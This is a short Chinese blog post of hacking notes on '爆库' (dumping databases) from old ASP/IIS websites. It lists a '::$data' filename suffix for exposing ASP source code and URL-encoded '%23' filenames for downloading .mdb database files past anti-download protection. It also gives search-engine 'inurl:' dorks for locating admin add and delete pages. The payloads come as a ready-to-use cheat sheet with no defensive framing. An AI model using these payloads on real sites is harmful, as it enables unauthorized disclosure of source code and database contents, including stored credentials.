- 在文件名后面加::$data 有可能爆出源码,例如:
http://127.0.0.1:2299/xyconn.asp::$data
- 爆库绕过防下载
#sdsf.mdb 下载时改为%23sdsf.mdb
#@!$%^&*asdfkladsf@!#.mdb
%23@%21%24%255E%26%2aasdfkladsf@%21%23.mdb
- 高级语法爆库
- inurl:./..admin../..add..
- inurl:./..admin../..del..
- inurl:/.asp<id=<%<%<%
爆库
本文标题:爆库
文章作者:Trans
发布时间:2018年12月24日 - 21时28分
最后更新:2018年12月24日 - 21时40分
原始链接:http://tranzimiss.com/2018/12/24/爆库/
许可协议: "署名-非商用-相同方式共享 3.0" 转载请保留原文链接及作者。
下载漏洞
CDN绕过
>